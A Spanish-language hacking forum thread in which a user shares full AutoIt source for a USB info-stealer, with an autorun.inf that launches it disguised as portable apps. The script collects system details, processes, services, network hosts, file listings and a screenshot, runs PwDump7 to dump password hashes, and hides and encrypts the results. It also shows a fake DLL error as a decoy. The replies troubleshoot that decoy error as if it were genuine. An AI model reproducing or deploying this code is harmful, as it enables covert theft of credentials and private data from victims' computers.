send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Auotit] Robo de informacion

  • 12 Respuestas
  • 3482 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 0b3Y

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
  • The World Is MINE!
    • Ver Perfil
« en: Mayo 22, 2014, 05:22:44 am »
Esta pensado para llevarlo en un usb y que al abrir el usb se abra esto, como un usb spreader, para que más adelante se pueda realizar un ataque más especifico y directo, pudiendo crear en tu casa un malware especifico para el ordenador.
Coge todo esta informacion:
1. Arquitectura.
2. El sistema operativo
3. Nombre del ordenador
4. Actual usuario
5. Ip interna
6. Service pack(si es xp o <)
Todo esto lo mete en un archivo dentro de una carpeta con el nombre del ordenador. También recoge en distintos archivos:
1. Procesos que están corriendo
2. Si existe el archivo PwDump7(sacar los usuarios con contraseña) los pone tambien.
3. Captura de pantalla.
4. Servicios que están corriendo.
5.Los ordenadores que estan conectados en red
6.Las carpetas existentes en el escritorio y los ejecutables
7.Las carpetas que hay en el program files, por lo que podemos deducir los programas que tiene instalados


Toda esta información como no ENCRYPTADA con la password que tu elijas, solo tienes que cambiar la variable $psw por la pass que tu quieras y encriptara toda esta info(menos los procesos que no se porque no me deja).
Quedaria una cosa tal que así:




Y desencriptado queda asi:




La carpeta se ve asi:




El codigo es totalmente abierto, pueden copiar cualquier parte del code sin problemas :P


Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#notrayicon
#include <Crypt.au3>
#include <ScreenCapture.au3>
#include <Process.au3>
#include <File.au3>
#include <Array.au3>

global $x32 = @CPUArch
global $SO = @OSVersion
global $nom = @ComputerName
global $usu = @UserName
global $dirip = @IPAddress1
global $idio = @OSLang
global $fecha = @MDAY & "-" & @MON & "-" & @YEAR
global $fecha2 = @HOUR & ":" & @MIN & ":" & @SEC
global $pack = @OSServicePack
global $psw = "underc0de.org!"
Func Idiom()
Select
    Case StringInStr("0413 0813", @OSLang)
        $idio = "Dutch"

    Case StringInStr("0409 0809 0c09 1009 1409 1809 1c09 2009 2409 2809 2c09 3009 3409", @OSLang)
        $idio = "English"

    Case StringInStr("040c 080c 0c0c 100c 140c 180c", @OSLang)
        $idio = "French"

    Case StringInStr("0407 0807 0c07 1007 1407", @OSLang)
        $idio = "German"

    Case StringInStr("0410 0810", @OSLang)
        $idio = "Italian"

    Case StringInStr("0414 0814", @OSLang)
        $idio = "Norwegian"

    Case StringInStr("0415", @OSLang)
        $idio = "Polish"

    Case StringInStr("0416 0816", @OSLang)
        $idio = "Portuguese"

    Case StringInStr("040a 080a 0c0a 100a 140a 180a 1c0a 200a 240a 280a 2c0a 300a 340a 380a 3c0a 400a 440a 480a 4c0a 500a", @OSLang)
        $idio = "Spanish"

    Case StringInStr("041d 081d", @OSLang)
        $idio = "Swedish"

    Case Else
        $idio = "Other (can't determine with @OSLang directly)"

    EndSelect
EndFunc


Func procesos()
$file = FileOpen($nom & "\procesos.txt",2)
Local $list = ProcessList()
For $i = 1 To $list[0][0] Step + 1
FileWrite($file,$list[$i][0] & @CRLF & $list[$i][1] & "-")
Next
FileClose($file)
FileSetAttrib($nom & "\procesos.txt","+RSH")
EndFunc


Func red()
$sCommand = "net view>>ordenadores-en-red.txt"
FileChangeDir($nom)
_RunDos($sCommand)
FileChangeDir(@ScriptDir)
_Crypt_EncryptFile($nom & "\ordenadores-en-red.txt",$nom & "\ordenadores_en_red.txt",$psw,26625)
FileSetAttrib($nom & "\ordenadores_en_red.txt","+RSH")
FileDelete($nom & "\ordenadores-en-red.txt")
EndFunc


Func usuarios()
if FileExists("PwDump7.exe") Then
$sCommand = "PwDump7.exe>>password.txt"
_RunDos($sCommand)
FileMove("Users-password.txt",$nom & "\Users-password.txt",1)
FileSetAttrib($nom & "\Users-password.txt","+RSH")
EndIf
EndFunc


Func screeen()
_ScreenCapture_Capture($nom & "\Screencapture.jpg")
FileSetAttrib($nom & "\*.jpg","+RSH")
EndFunc


Func infsys2()
FileChangeDir($nom)
$comand2 = "systeminfo>infsys-2.txt"
_RunDos($comand2)
FileChangeDir(@ScriptDir)
_Crypt_EncryptFile($nom & "\infsys-2.txt",$nom & "\Informacion_del_sistema_2.txt",$psw,26625)
FileDelete($nom&"\infsys-2.txt")
FileSetAttrib($nom&"\Informacion_del_sistema_2.txt","+RSH")
EndFunc


Func servicios()
FileChangeDir ($nom)
$sCommand = "net start > servicio.txt"
_RunDos($sCommand)
FileChangeDir(@ScriptDir)
_Crypt_EncryptFile($nom & "\servicio.txt",$nom & "\servicios.txt",$psw,26625)
FileDelete($nom & "\servicio.txt")
FileSetAttrib($nom & "\servicios.txt","+RSH")
EndFunc


Func carptescri()
$Escritorio = _FileListToArray(@DesktopDir)
$file = FileOpen($nom & "\escritorio.txt",2)
FileWriteLine($file,"Carpetas y archivos en el escritorio")
For $x = 1 to $Escritorio[0] Step + 1
FileWriteLine($file,$Escritorio[$x])
Next
FileClose($file)
_Crypt_EncryptFile($nom & "\escritorio.txt",$nom & "\archivos en el escritorio.txt",$psw,26625)
FileDelete($nom & "\escritorio.txt")
FileSetAttrib($nom & "\archivos en el escritorio.txt","+RSH")
EndFunc


Func carptprogram()
$Archivos_de_programa = _FileListToArray(@ProgramFilesDir)
$Fichero_de_salida = FileOpen($nom & "\programas_instalados.txt",2)
FileWriteLine($Fichero_de_salida,"Programas instalados")
For $x = 1 to $Archivos_de_programa[0] Step + 1
FileWriteLine($Fichero_de_salida,$Archivos_de_programa[$x])
Next
FileClose($Fichero_de_salida)
_Crypt_EncryptFile($nom & "\programas_instalados.txt",$nom & "\programas instalados.txt",$psw,26625)
FileDelete($nom&"\programas_instalados.txt")
FileSetAttrib($nom&"\programas instalados.txt","+RSH")
EndFunc

Func todo()
DirCreate($nom)
FileSetAttrib($nom,"+SH")
$file = FileOpen($nom & "\" & "infsys " & $nom & " " & $fecha & ".txt",1)
$todo = "x32 o x64: " & $x32 & @CRLF & "Idioma del S.O: " & $idio & @CRLF & "Sistema operativo: " & $SO & @CRLF & "Nombre del ordenador: " & $nom & @CRLF & "Nombre del usuario: " & $usu & @CRLF & "Direccion IP interna: " & $dirip & @CRLF & "Altura de resolucion (en pixels): " & @DesktopHeight & @CRLF & "Anchura de resolucion (en pixels): " & @DesktopWidth & @CRLF & "Service pack: " & $pack
$todo = _Crypt_EncryptData($todo,$psw,26625)
FileWrite($file,$todo)
FileSetAttrib($nom & "\" & "infsys " & $nom & " " & $fecha & ".txt","+RSH")



Idiom()
procesos()
infsys2()
servicios()
usuarios()
carptescri()
carptprogram()
red()
screeen()
EndFunc


if FileExists($nom) Then
MsgBox(16,"Error","The Filesys.dll is needed to the correct function of the program",0)
DirRemove(@ScriptDir&"\"&$nom,1)
todo()
Else
todo()
EndIf


Tambien les regalo este autorun.inf que tendran que poner en el usb para que se abra automaticamente, el autorun.inf quedaria asi(se puede cambiar el nombre al que tengas del programa):
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[Autorun]
Open=Programa.exe
Icon=Programa.exe
Label=Aplicaciones Portables
UserAutoPlay=1
action=Abrir USB
action=@Programa.exe
shell\open=Abrir
shell\open\Command=Programa.exe
shell\explore=explorar
shell\explore\Command=Programa.exe
« Última modificación: Mayo 22, 2014, 01:58:03 pm por 0b3Y »

Desconectado Rocky91

  • *
  • Underc0der
  • Mensajes: 47
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Mayo 22, 2014, 12:29:56 pm »
Buenas tardes.

No me permite ejecutarlo en Windows 7, problemas de compatibilidad ¿?.

Saludos.

Desconectado 0b3Y

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
  • The World Is MINE!
    • Ver Perfil
« Respuesta #2 en: Mayo 22, 2014, 01:54:31 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas tardes.

No me permite ejecutarlo en Windows 7, problemas de compatibilidad ¿?.

Saludos.

De hecho no deberia hacer eso.. Que error te tira exactamente? A mi en mi PC si que me funciona...

Desconectado Atomic

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Mayo 21, 2015, 09:42:51 am »
Hola, a mi me parece con este error: "The Filesys.dll is needed to the correct function of the program"

¿Como lo puedo solucionar?

Gracias

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5283
  • Actividad:
    35%
  • Reputación 28
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #4 en: Mayo 21, 2015, 09:53:00 am »
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el mismo mensaje te lo está diciendo.. te falta esa DLL.

Acá tenes los pasos para colocarla en tu pc:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos!
ANTRAX


Desconectado Atomic

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Mayo 22, 2015, 03:37:23 pm »
Muchas gracias @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  :D

Es un excelente aporte @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , pero creo que si sera difícil robar información con la USB, ya que si el dispositivo objetivo marca el error de Filesys.dll no se podrá ejecutar :S
He probado en 3 equipos diferentes pero en los 3 encuentro la misma falla  :-\


Saludos.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5283
  • Actividad:
    35%
  • Reputación 28
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #6 en: Mayo 22, 2015, 03:39:16 pm »
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, probaste poniendo esa dll dentro del pendrive?


Desconectado Atomic

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Mayo 22, 2015, 03:56:58 pm »
Si y aun no logro nada, no se si sea necesario registrar el Filesys.dll (regsvr32 filesystem.dll ) pero con algún comando (que no conozco) en autoit.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5283
  • Actividad:
    35%
  • Reputación 28
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #8 en: Mayo 22, 2015, 04:08:28 pm »
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

De hecho si se puede

Código: Text
  1. $_DllPath = @ProgramFilesDir & '\RUTA\DE\filesystem.dll'
  2. RunWait ( @Systemdir & '\regsvr32.exe "' & $_DllPath & '" /s' )

Saludos!
ANTRAX


Desconectado Atomic

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Mayo 22, 2015, 06:08:26 pm »
Lo intente agregándolo después de los #include por ejemplo así:


$_DllPath = @ProgramFilesDir & '\F:\filesystem.dll'
RunWait ( @Systemdir & '\regsvr32.exe "' & $_DllPath & '" /s' )

Donde F: suponiendo que es la letra del USB pero aun me aparece el error del filesystem.dll
También lo intente agregando el dll al disco C: pero sigue apareciendo el error.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5283
  • Actividad:
    35%
  • Reputación 28
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #10 en: Mayo 22, 2015, 06:29:06 pm »
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login,

Proba sacando la \ que aparece adelante de la F. Asi:

$_DllPath = @ProgramFilesDir & 'F:\filesystem.dll'

Y si no te funciona, proba poniendolo asi:

$_DllPath = @ProgramFilesDir & 'filesystem.dll'

(Si es que dejaste la dll en el mismo directorio que este script)

Saludos!
ANTRAX


Desconectado Atomic

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Mayo 29, 2015, 01:31:27 pm »
Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Intente de las ultimas 2 formas que me pasaste, pero aun me sale el mismo error.

Seguiré investigando por que ese código es buenísimo.

Saludos.

Desconectado 79137913

  • *
  • Moderator
  • Mensajes: 615
  • Actividad:
    5%
  • Reputación 10
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #12 en: Mayo 29, 2015, 02:47:47 pm »
HOLA!!!

Tu problema es que estas concatenando ProgramFiles con el disco F,
Cual es la ruta absoluta de tu DLL?
F:\filesystem.dll?
Si es esta primero copiala al disco local: (elijo Mis documentos por que no se necesitan derechos de admin)
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
FileCopy('F:\filesystem.dll',  @MyDocumentsDir & '\filesystem.dll', 8)Luego registrala:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
$_DllPath = @MyDocumentsDir & '\RUTA\DE\filesystem.dll'
RunWait ( @Systemdir & '\regsvr32.exe "' & $_DllPath & '" /s' )

Si tu DLL no esta en esa ruta haz otra consulta mas detallada.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!